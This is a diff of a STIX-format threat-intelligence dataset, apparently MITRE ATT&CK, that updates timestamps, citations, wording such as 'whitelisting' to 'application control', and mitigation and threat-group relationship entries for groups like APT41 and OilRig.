+ "url": "https://support.microsoft.com/en-us/help/2871997/microsoft-security-advisory-update-to-improve-credentials-protection-a",
+ "description": "Microsoft. (2014, May 13). Microsoft Security Advisory: Update to improve credentials protection and management. Retrieved June 8, 2020."
}
],
"type": "relationship",
- "modified": "2020-03-25T16:25:17.469Z",
+ "modified": "2020-06-09T20:44:40.880Z",
"created": "2019-07-17T15:45:37.582Z"
},
{
@@ -146268,7 +147592,7 @@
"description": "Enforce the principle of least-privilege. Consider implementing access control mechanisms that include both authentication and authorization.",
"id": "relationship--8b3f2915-ca04-4770-88bb-e6f1314da34d",
"type": "relationship",
- "modified": "2020-03-24T14:48:48.035Z",
+ "modified": "2020-06-30T22:50:06.318Z",
"created": "2019-07-17T18:51:33.926Z"
},
{
@@ -146392,7 +147716,7 @@
"description": "By default, only administrators are allowed to connect remotely using WMI. Restrict other users who are allowed to connect, or disallow all users to connect remotely to WMI.",
"id": "relationship--48e6b5fc-9d82-4cdf-84aa-bc23647e1234",
"type": "relationship",
- "modified": "2020-03-09T14:52:27.115Z",
+ "modified": "2020-05-13T22:50:51.536Z",
"created": "2019-07-17T20:04:40.541Z"
},
{
@@ -146403,10 +147727,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65",
"relationship_type": "mitigates",
- "description": "Identify and block potentially malicious software executed through this technique by using application whitelisting tools capable of preventing unknown DLLs from being loaded.",
+ "description": "Identify and block potentially malicious software executed through this technique by using application control tools capable of preventing unknown DLLs from being loaded.",
"id": "relationship--2c89cab1-efbb-405c-930d-197ae1910e5b",
"type": "relationship",
- "modified": "2020-03-28T18:14:37.101Z",
+ "modified": "2020-06-20T20:11:42.541Z",
"created": "2019-07-17T20:12:19.105Z"
},
{
@@ -146446,7 +147770,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-28T00:35:24.697Z",
+ "modified": "2020-05-20T13:33:50.934Z",
"created": "2019-07-17T20:22:08.552Z"
},
{
@@ -146471,10 +147795,17 @@
"source_ref": "course-of-action--15437c6d-b998-4a36-be41-4ace3d54d266",
"target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c",
"relationship_type": "mitigates",
- "description": "Regularly scan externally facing systems for vulnerabilities and establish procedures to rapidly patch systems when critical vulnerabilities are discovered through scanning and through public disclosure.",
+ "description": "Regularly scan externally facing systems for vulnerabilities and establish procedures to rapidly patch systems when critical vulnerabilities are discovered through scanning and through public disclosure.(Citation: OWASP Top 10)",
"id": "relationship--4c308ec1-f0c6-4444-af7d-ff045204c326",
+ "external_references": [
+ {
+ "url": "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project",
+ "description": "OWASP. (2018, February 23). OWASP Top Ten Project. Retrieved April 3, 2018.",
+ "source_name": "OWASP Top 10"
+ }
+ ],
"type": "relationship",
- "modified": "2020-02-18T16:10:39.251Z",
+ "modified": "2020-07-14T22:22:06.471Z",
"created": "2019-07-17T21:07:56.528Z"
},
{
@@ -146502,7 +147833,7 @@
"description": "Limit access to remote services through centrally managed concentrators such as VPNs and other managed remote access systems.",
"id": "relationship--9eaaffb7-4dc4-4aac-a1d5-675b71e587df",
"type": "relationship",
- "modified": "2020-03-23T19:37:54.227Z",
+ "modified": "2020-06-19T20:07:09.773Z",
"created": "2019-07-17T21:15:42.971Z"
},
{
@@ -146516,7 +147847,7 @@
"description": "Deny direct remote access to internal systems through the use of network proxies, gateways, and firewalls.",
"id": "relationship--8df2f4b5-3f60-4b8f-b4aa-dd76eb347ab0",
"type": "relationship",
- "modified": "2020-03-23T19:37:54.252Z",
+ "modified": "2020-06-19T20:07:09.776Z",
"created": "2019-07-17T21:15:42.984Z"
},
{
@@ -146530,7 +147861,7 @@
"description": "Disable or block remotely available services that may be unnecessary.",
"id": "relationship--9aaf5e70-4080-4f73-8d6d-3b19f754e9b9",
"type": "relationship",
- "modified": "2020-03-23T19:37:54.266Z",
+ "modified": "2020-06-19T20:07:09.800Z",
"created": "2019-07-17T21:15:42.990Z"
},
{
@@ -146544,7 +147875,7 @@
"description": "Use strong two-factor or multi-factor authentication for remote service accounts to mitigate an adversary's ability to leverage stolen credentials, but be aware of [Two-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111) techniques for some two-factor authentication implementations.",
"id": "relationship--e23d57b4-5bc4-4d06-9084-9c99464c4af8",
"type": "relationship",
- "modified": "2020-03-23T19:37:54.268Z",
+ "modified": "2020-06-19T20:07:09.808Z",
"created": "2019-07-17T21:15:43.002Z"
},
{
@@ -146585,9 +147916,9 @@
"description": "Robbins, A. (2018, April 2). A Red Teamer\u2019s Guide to GPOs and OUs. Retrieved March 5, 2019."
},
{
- "source_name": "Microsoft WMI Filters",
+ "description": "Microsoft. (2008, September 11). Fun with WMI Filters in Group Policy. Retrieved March 13, 2019.",
"url": "https://blogs.technet.microsoft.com/askds/2008/09/11/fun-with-wmi-filters-in-group-policy/",
- "description": "Microsoft. (2008, September 11). Fun with WMI Filters in Group Policy. Retrieved March 13, 2019."
+ "source_name": "Microsoft WMI Filters"
},
{
"source_name": "Microsoft GPO Security Filtering",
@@ -146596,7 +147927,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-26T21:17:41.479Z",
+ "modified": "2020-05-20T13:49:12.427Z",
"created": "2019-07-17T21:33:42.484Z"
},
{
@@ -146694,7 +148025,7 @@
"description": "Consider technical controls to prevent the disabling of services or deletion of files involved in system recovery. ",
"id": "relationship--c4cd9acb-aaea-4b77-890e-f153a58623a4",
"type": "relationship",
- "modified": "2019-07-19T14:37:37.523Z",
+ "modified": "2020-07-14T19:33:52.657Z",
"created": "2019-07-18T15:05:36.677Z"
},
{
@@ -146867,7 +148198,7 @@
"description": "Since browser pivoting requires a high integrity process to launch from, restricting user permissions and addressing Privilege Escalation and [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) opportunities can limit the exposure to this technique.",
"id": "relationship--a9f79f14-d160-4be5-8bbe-ad0b52770b9f",
"type": "relationship",
- "modified": "2019-10-25T15:25:00.324Z",
+ "modified": "2020-07-14T19:39:44.799Z",
"created": "2019-07-18T15:36:27.535Z"
},
{
@@ -146878,10 +148209,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
"relationship_type": "mitigates",
- "description": "Use tools that restrict program execution via whitelisting by attributes other than file name for common operating system utilities that are needed.",
+ "description": "Use tools that restrict program execution via application control by attributes other than file name for common operating system utilities that are needed.",
"id": "relationship--eb5ade8c-73e9-4b69-9dea-c8a8206dec25",
"type": "relationship",
- "modified": "2020-03-29T20:10:19.426Z",
+ "modified": "2020-07-09T13:54:28.926Z",
"created": "2019-07-18T15:46:37.654Z"
},
{
@@ -147047,7 +148378,7 @@
"description": "Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory C: and system directories, such as C:\\Windows\\, to reduce places where malicious files could be placed for execution.",
"id": "relationship--9a8e7eea-dbef-45b4-9b97-0d85b5defb83",
"type": "relationship",
- "modified": "2020-03-30T13:45:24.516Z",
+ "modified": "2020-07-06T18:49:36.003Z",
"created": "2019-07-18T17:08:41.171Z"
},
{
@@ -147061,7 +148392,7 @@
"description": "Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.",
"id": "relationship--4b5e8e16-ddf4-4339-859b-f70f980d612b",
"type": "relationship",
- "modified": "2020-01-22T20:28:29.856Z",
+ "modified": "2020-07-01T18:27:41.895Z",
"created": "2019-07-18T17:11:15.628Z"
},
{
@@ -147138,7 +148469,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--bcdd57cf-632f-4fc5-a8e8-d3137cb832e8",
"type": "relationship",
- "modified": "2020-03-26T20:27:44.231Z",
+ "modified": "2020-06-20T22:16:03.760Z",
"created": "2019-07-18T17:27:05.228Z"
},
{
@@ -147177,10 +148508,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7",
"relationship_type": "mitigates",
- "description": "Use application whitelisting to mitigate installation and use of unapproved software that can be used for remote access.",
+ "description": "Use application control to mitigate installation and use of unapproved software that can be used for remote access.",
"id": "relationship--54306888-1f93-4461-bcac-a56ae7073b31",
"type": "relationship",
- "modified": "2020-03-27T18:01:17.926Z",
+ "modified": "2020-06-20T20:42:37.470Z",
"created": "2019-07-18T17:42:08.950Z"
},
{
@@ -147194,7 +148525,7 @@
"description": "Properly configure firewalls, application firewalls, and proxies to limit outgoing traffic to sites and services used by remote access tools.",
"id": "relationship--80a23356-20b7-49a3-a48e-e0c04e2bff86",
"type": "relationship",
- "modified": "2020-03-27T18:01:17.922Z",
+ "modified": "2020-06-20T20:42:37.483Z",
"created": "2019-07-18T17:42:08.974Z"
},
{
@@ -147250,7 +148581,7 @@
"description": "Limit the use of USB devices and removable media within a network.",
"id": "relationship--5c245d0b-61e7-4558-8b36-32c846266af0",
"type": "relationship",
- "modified": "2019-07-18T17:52:28.558Z",
+ "modified": "2020-07-14T19:45:59.785Z",
"created": "2019-07-18T17:52:28.558Z"
},
{
@@ -147417,7 +148748,7 @@
"description": "Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations.",
"id": "relationship--b5023b20-4243-4686-8b51-429ae7ac73cb",
"type": "relationship",
- "modified": "2019-10-25T15:25:00.437Z",
+ "modified": "2020-07-14T19:34:47.808Z",
"created": "2019-07-18T19:18:32.950Z"
},
{
@@ -147933,7 +149264,7 @@
}
],
"type": "relationship",
- "modified": "2019-10-25T15:38:35.548Z",
+ "modified": "2020-07-14T19:33:52.662Z",
"created": "2019-07-19T14:37:37.517Z"
},
{
@@ -148043,7 +149374,7 @@
"description": "[Execution Guardrails](https://attack.mitre.org/techniques/T1480) likely should not be mitigated with preventative controls because it may protect unintended targets from being compromised. If targeted, efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior if compromised.",
"id": "relationship--20cc9dc5-61ad-4fbb-86da-4861e60b98e4",
"type": "relationship",
- "modified": "2019-07-23T14:44:24.818Z",
+ "modified": "2020-06-24T14:37:18.194Z",
"created": "2019-07-19T14:59:44.180Z"
},
{
@@ -149532,11 +150863,11 @@
"source_name": "FireEye APT34 July 2019"
}
],
- "description": "[OilRig](https://attack.mitre.org/groups/G0049) has used LinkedIn to send spearphishing links.(Citation: FireEye APT34 July 2019) ",
+ "description": "[OilRig](https://attack.mitre.org/groups/G0049) has used LinkedIn to send spearphishing links.(Citation: FireEye APT34 July 2019)",
"relationship_type": "uses",
"id": "relationship--b3d6abc5-11da-4d0c-a699-8cafac03dfab",
"type": "relationship",
- "modified": "2019-09-04T22:55:41.557Z",
+ "modified": "2020-07-04T23:23:08.115Z",
"created": "2019-08-26T17:00:30.957Z"
},
{
@@ -151559,13 +152890,18 @@
"source_name": "FireEye APT41 Aug 2019",
"url": "https://content.fireeye.com/apt-41/rpt-apt41",
"description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019."
+ },
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
}
],
- "description": "[APT41](https://attack.mitre.org/groups/G0096) leveraged PowerShell to deploy malware families in victims\u2019 environments.(Citation: FireEye APT41 Aug 2019)",
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) leveraged PowerShell to deploy malware families in victims\u2019 environments.(Citation: FireEye APT41 Aug 2019)(Citation: FireEye APT41 March 2020)",
"relationship_type": "uses",
"id": "relationship--1aaecef9-d21a-420c-a6c0-53cca7a5e5d8",
"type": "relationship",
- "modified": "2019-09-23T22:53:30.177Z",
+ "modified": "2020-04-28T13:48:00.874Z",
"created": "2019-09-23T22:53:30.177Z"
},
{
@@ -151624,11 +152960,11 @@
"description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019."
}
],
- "description": "[APT41](https://attack.mitre.org/groups/G0096) compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.(Citation: FireEye APT41 Aug 2019)",
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.(Citation: FireEye APT41 Aug 2019)\n",
"relationship_type": "uses",
"id": "relationship--556f8dd8-50e0-4115-9815-c20bfc2b915a",
"type": "relationship",
- "modified": "2019-09-23T22:53:30.248Z",
+ "modified": "2020-04-30T20:31:38.353Z",
"created": "2019-09-23T22:53:30.248Z"
},
{
@@ -151666,11 +153002,11 @@
"description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019."
}
],
- "description": "[APT41](https://attack.mitre.org/groups/G0096) used DGA to change their C2 servers monthly.(Citation: FireEye APT41 Aug 2019)",
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) has used DGAs to change their C2 servers monthly.(Citation: FireEye APT41 Aug 2019)",
"relationship_type": "uses",
"id": "relationship--8488f2ee-be97-458c-894b-830add635fa8",
"type": "relationship",
- "modified": "2020-03-20T19:57:43.864Z",
+ "modified": "2020-06-02T21:31:00.457Z",
"created": "2019-09-23T22:53:30.257Z"
},
{
@@ -151787,16 +153123,21 @@
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"external_references": [
{
- "description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.",
+ "source_name": "FireEye APT41 Aug 2019",
"url": "https://content.fireeye.com/apt-41/rpt-apt41",
- "source_name": "FireEye APT41 Aug 2019"
+ "description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019."
+ },
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
}
],
- "description": "[APT41](https://attack.mitre.org/groups/G0096) created and modified startup files for persistence.(Citation: FireEye APT41 Aug 2019) ",
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) created and modified startup files for persistence.(Citation: FireEye APT41 Aug 2019) [APT41](https://attack.mitre.org/groups/G0096) added a registry key in HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost to establish persistence for Cobalt Strike.(Citation: FireEye APT41 March 2020)",
"relationship_type": "uses",
"id": "relationship--6ad8e998-041f-491d-8691-4990022248e0",
"type": "relationship",
- "modified": "2019-10-14T21:52:59.706Z",
+ "modified": "2020-05-01T13:57:23.939Z",
"created": "2019-09-23T23:08:25.339Z"
},
{
@@ -151955,16 +153296,21 @@
"target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"external_references": [
{
- "description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.",
+ "source_name": "FireEye APT41 Aug 2019",
"url": "https://content.fireeye.com/apt-41/rpt-apt41",
- "source_name": "FireEye APT41 Aug 2019"
+ "description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019."
+ },
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
}
],
- "description": "[APT41](https://attack.mitre.org/groups/G0096) modified legitimate Windows services to install malware backdoors.(Citation: FireEye APT41 Aug 2019)",
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) modified legitimate Windows services to install malware backdoors.(Citation: FireEye APT41 Aug 2019) [APT41](https://attack.mitre.org/groups/G0096) created the StorSyncSvc service to provide persistence for Cobalt Strike.(Citation: FireEye APT41 March 2020)",
"relationship_type": "uses",
"id": "relationship--29cd1209-5e90-448f-83d3-42c3ecdd1f70",
"type": "relationship",
- "modified": "2019-10-14T21:52:59.768Z",
+ "modified": "2020-05-01T13:57:23.946Z",
"created": "2019-09-23T23:08:25.450Z"
},
{
@@ -151997,16 +153343,21 @@
"target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"external_references": [
{
- "description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.",
+ "source_name": "FireEye APT41 Aug 2019",
"url": "https://content.fireeye.com/apt-41/rpt-apt41",
- "source_name": "FireEye APT41 Aug 2019"
+ "description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019."
+ },
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
}
],
- "description": "[APT41](https://attack.mitre.org/groups/G0096) used cmd.exe /c to execute commands on remote machines.(Citation: FireEye APT41 Aug 2019)",
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) used cmd.exe /c to execute commands on remote machines.(Citation: FireEye APT41 Aug 2019)\n[APT41](https://attack.mitre.org/groups/G0096) used a batch file to install persistence for the [Cobalt Strike](https://attack.mitre.org/software/S0154) BEACON loader.(Citation: FireEye APT41 March 2020)",
"relationship_type": "uses",
"id": "relationship--81a15403-9bb3-408a-8da6-97c64209c829",
"type": "relationship",
- "modified": "2020-03-17T18:50:16.117Z",
+ "modified": "2020-04-28T13:48:00.870Z",
"created": "2019-09-23T23:08:25.407Z"
},
{
@@ -153399,7 +154750,7 @@
"description": "Protect domain controllers by ensuring proper security configuration for critical servers to limit access by potentially unnecessary protocols and services, such as SMB file sharing.",
"id": "relationship--ff7f776f-001a-4c86-b359-08c89bd08b3e",
"type": "relationship",
- "modified": "2020-03-23T15:28:13.578Z",
+ "modified": "2020-05-04T18:36:39.480Z",
"created": "2019-10-03T18:21:39.015Z"
},
{
@@ -153469,7 +154820,7 @@
"description": "Users need to be trained to not authorize third-party applications they don\u2019t recognize. The user should pay particular attention to the redirect URL: if the URL is a misspelled or convoluted sequence of words related to an expected service or SaaS application, the website is likely trying to spoof a legitimate service. Users should also be cautious about the permissions they are granting to apps. For example, offline access and access to read emails should excite higher suspicions because adversaries can utilize SaaS APIs to discover credentials and other sensitive communications.",
"id": "relationship--9c3d1701-b0ed-4a20-a864-d2681535cfa8",
"type": "relationship",
- "modified": "2019-10-18T15:20:05.591Z",
+ "modified": "2020-07-14T19:16:31.117Z",
"created": "2019-10-04T19:37:26.696Z"
},
{
@@ -153647,7 +154998,7 @@
}
],
"type": "relationship",
- "modified": "2019-10-22T20:02:00.579Z",
+ "modified": "2020-07-09T14:02:05.406Z",
"created": "2019-10-05T02:15:29.999Z"
},
{
@@ -153658,10 +155009,17 @@
"source_ref": "course-of-action--b045d015-6bed-4490-bd38-56b41ece59a0",
"target_ref": "attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7",
"relationship_type": "mitigates",
- "description": "Consider using multi-factor authentication to restrict access to resources and cloud storage APIs.(Citation:Amazon S3 Security, 2019)",
+ "description": "Consider using multi-factor authentication to restrict access to resources and cloud storage APIs.(Citation: Amazon S3 Security, 2019)",
"id": "relationship--ee3162ad-e88e-401c-9fdf-e7f0784141a4",
+ "external_references": [
+ {
+ "source_name": "Amazon S3 Security, 2019",
+ "url": "https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/",
+ "description": "Amazon. (2019, May 17). How can I secure the files in my Amazon S3 bucket?. Retrieved October 4, 2019."
+ }
+ ],
"type": "relationship",
- "modified": "2019-10-22T20:02:00.781Z",
+ "modified": "2020-07-09T14:02:05.384Z",
"created": "2019-10-05T02:15:30.002Z"
},
{
@@ -153672,9 +155030,14 @@
"source_ref": "course-of-action--feff9142-e8c2-46f4-842b-bd6fb3d41157",
"target_ref": "attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7",
"relationship_type": "mitigates",
- "description": "Encrypt data stored at rest in cloud storage.(Citation:Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019) Managed encryption keys can be rotated by most providers. At a minimum, ensure an incident response plan to storage breach includes rotating the keys and test for impact on client applications.(Citation: Google Cloud Encryption Key Rotation)",
+ "description": "Encrypt data stored at rest in cloud storage.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019) Managed encryption keys can be rotated by most providers. At a minimum, ensure an incident response plan to storage breach includes rotating the keys and test for impact on client applications.(Citation: Google Cloud Encryption Key Rotation)",
"id": "relationship--55fa32b7-b9d2-4c57-9614-b7793b2770f2",
"external_references": [
+ {
+ "source_name": "Amazon S3 Security, 2019",
+ "url": "https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/",
+ "description": "Amazon. (2019, May 17). How can I secure the files in my Amazon S3 bucket?. Retrieved October 4, 2019."
+ },
{
"source_name": "Microsoft Azure Storage Security, 2019",
"url": "https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide",
@@ -153687,7 +155050,7 @@
}
],
"type": "relationship",
- "modified": "2019-10-22T20:02:00.772Z",
+ "modified": "2020-07-09T14:02:05.436Z",
"created": "2019-10-05T02:15:30.004Z"
},
{
@@ -153698,10 +155061,17 @@
"source_ref": "course-of-action--cc2399fd-3cd3-4319-8d0a-fbd6420cdaf8",
"target_ref": "attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7",
"relationship_type": "mitigates",
- "description": "Frequently check permissions on cloud storage to ensure proper permissions are set to deny open or unprivileged access to resources.(Citation:Amazon S3 Security, 2019)",
+ "description": "Frequently check permissions on cloud storage to ensure proper permissions are set to deny open or unprivileged access to resources.(Citation: Amazon S3 Security, 2019)",
"id": "relationship--e3e50d39-fa69-4fca-9353-259247dbd439",
+ "external_references": [
+ {
+ "source_name": "Amazon S3 Security, 2019",
+ "url": "https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/",
+ "description": "Amazon. (2019, May 17). How can I secure the files in my Amazon S3 bucket?. Retrieved October 4, 2019."
+ }
+ ],
"type": "relationship",
- "modified": "2019-10-22T20:02:00.783Z",
+ "modified": "2020-07-09T14:02:05.435Z",
"created": "2019-10-05T02:15:30.005Z"
},
{
@@ -153715,7 +155085,7 @@
"description": "Use access control lists on storage systems and objects.",
"id": "relationship--be61f77a-93a3-4699-b134-52b199c7b196",
"type": "relationship",
- "modified": "2019-10-22T20:02:00.789Z",
+ "modified": "2020-07-09T14:02:05.453Z",
"created": "2019-10-05T02:15:30.007Z"
},
{
@@ -154121,7 +155491,7 @@
"description": "Administrators should perform an audit of all OAuth applications and the permissions they have been granted to access organizational data. This should be done extensively on all applications in order to establish a baseline, followed up on with periodic audits of new or updated applications. Suspicious applications should be investigated and removed.",
"id": "relationship--4b5948b4-eba5-4af6-93d1-71b109167f62",
"type": "relationship",
- "modified": "2019-10-18T15:20:05.617Z",
+ "modified": "2020-07-14T19:16:31.139Z",
"created": "2019-10-08T19:55:33.729Z"
},
{
@@ -154135,7 +155505,7 @@
"description": "A Cloud Access Security Broker (CASB) can be used to set usage policies and manage user permissions on cloud applications to prevent access to application access tokens.",
"id": "relationship--d3e90e1c-b669-4909-ae44-75bfe8bf89e8",
"type": "relationship",
- "modified": "2019-10-18T15:20:05.616Z",
+ "modified": "2020-07-14T19:16:31.141Z",
"created": "2019-10-08T19:55:33.750Z"
},
{
@@ -154149,7 +155519,7 @@
"description": "Administrators can block end-user consent to OAuth applications, disabling users from authorizing third-party apps through OAuth 2.0 and forcing administrative consent for all requests. They can also block end-user registration of applications by their users, to reduce risk. A Cloud Access Security Broker can also be used to ban applications.\n\nAzure offers a couple of enterprise policy settings in the Azure Management Portal that may help:\n\n\"Users -> User settings -> App registrations: Users can register applications\" can be set to \"no\" to prevent users from registering new applications. \n\"Enterprise applications -> User settings -> Enterprise applications: Users can consent to apps accessing company data on their behalf\" can be set to \"no\" to prevent users from consenting to allow third-party multi-tenant applications",
"id": "relationship--25407fd4-3940-4446-9c17-6eebe902dbdf",
"type": "relationship",
- "modified": "2019-10-18T15:20:05.614Z",
+ "modified": "2020-07-14T19:16:31.162Z",
"created": "2019-10-08T19:55:33.752Z"
},
{
@@ -154210,7 +155580,7 @@
"description": "Ensure that applications do not store sensitive data or credentials insecurely. (e.g. plaintext credentials in code, published credentials in repositories, or credentials in public cloud storage).",
"id": "relationship--c8acdf40-8237-487f-8255-91afa327705d",
"type": "relationship",
- "modified": "2020-03-23T20:59:39.909Z",
+ "modified": "2020-06-20T22:44:36.305Z",
"created": "2019-10-10T18:46:45.553Z"
},
{
@@ -154231,7 +155601,7 @@
}
],
"type": "relationship",
- "modified": "2019-10-22T19:56:22.154Z",
+ "modified": "2020-07-14T19:17:44.658Z",
"created": "2019-10-10T19:17:52.805Z"
},
{
@@ -154860,6 +156230,27 @@
"modified": "2019-10-11T17:33:29.152Z",
"created": "2019-10-11T17:33:29.152Z"
},
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
+ "target_ref": "attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c",
+ "relationship_type": "mitigates",
+ "description": "Limit permissions for creating new instances in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.(Citation: Mandiant M-Trends 2020)",
+ "id": "relationship--e6a74691-5e6a-49ef-b8dc-e3d9e28fe048",
+ "external_references": [
+ {
+ "source_name": "Mandiant M-Trends 2020",
+ "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020."
+ }
+ ],
+ "type": "relationship",
+ "modified": "2020-06-18T11:45:36.669Z",
+ "created": "2019-10-11T17:48:31.883Z"
+ },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -154892,7 +156283,7 @@
"description": "Enforce the principle of least-privilege by limiting dashboard visibility to only the resources required. This may limit the discovery value of the dashboard in the event of a compromised account.",
"id": "relationship--ba2b1689-b46c-4451-9618-1c1669a0da0c",
"type": "relationship",
- "modified": "2019-10-23T14:19:37.591Z",
+ "modified": "2020-07-14T19:19:01.079Z",
"created": "2019-10-11T20:39:32.568Z"
},
{
@@ -154934,7 +156325,7 @@
}
],
"type": "relationship",
- "modified": "2019-10-22T19:59:20.647Z",
+ "modified": "2020-04-21T15:26:25.905Z",
"created": "2019-10-14T16:25:38.680Z"
},
{
@@ -154948,7 +156339,7 @@
"description": "Configure browsers or tasks to regularly delete persistent cookies.",
"id": "relationship--248a0d72-d9cd-43d3-985f-a33a49a79e8b",
"type": "relationship",
- "modified": "2019-10-22T19:59:20.658Z",
+ "modified": "2020-04-21T15:26:25.894Z",
"created": "2019-10-14T16:25:38.693Z"
},
{
@@ -154962,7 +156353,7 @@
"description": "Train users to identify aspects of phishing attempts where they're asked to enter credentials into a site that has the incorrect domain for the application they are logging into.",
"id": "relationship--f780f9d8-1baa-41b7-b7a1-acba717df0ab",
"type": "relationship",
- "modified": "2019-10-22T19:59:20.675Z",
+ "modified": "2020-04-21T15:26:25.950Z",
"created": "2019-10-14T16:25:38.695Z"
},
{
@@ -155148,7 +156539,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T22:47:34.297Z",
+ "modified": "2020-05-20T13:12:02.994Z",
"created": "2019-10-16T20:44:09.399Z"
},
{
@@ -155159,10 +156550,10 @@
"source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d",
"target_ref": "attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7",
"relationship_type": "mitigates",
- "description": "Cloud service providers support IP-based restrictions when accessing cloud resources. Consider using IP whitelisting along with user account management to ensure that data access is restricted not only to valid users but only from expected IP ranges to mitigate the use of stolen credentials to access data.",
+ "description": "Cloud service providers support IP-based restrictions when accessing cloud resources. Consider using IP allowlisting along with user account management to ensure that data access is restricted not only to valid users but only from expected IP ranges to mitigate the use of stolen credentials to access data.",
"id": "relationship--cf63b75f-564f-4713-a5b3-1f102d098e8e",
"type": "relationship",
- "modified": "2019-10-22T20:02:00.850Z",
+ "modified": "2020-07-09T14:02:05.452Z",
"created": "2019-10-17T19:25:21.088Z"
},
{
@@ -155296,7 +156687,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T23:49:21.906Z",
+ "modified": "2020-06-25T17:48:09.233Z",
"created": "2019-11-07T20:29:18.340Z"
},
{
@@ -155343,14 +156734,14 @@
"source_name": "TCG Trusted Platform Module"
},
{
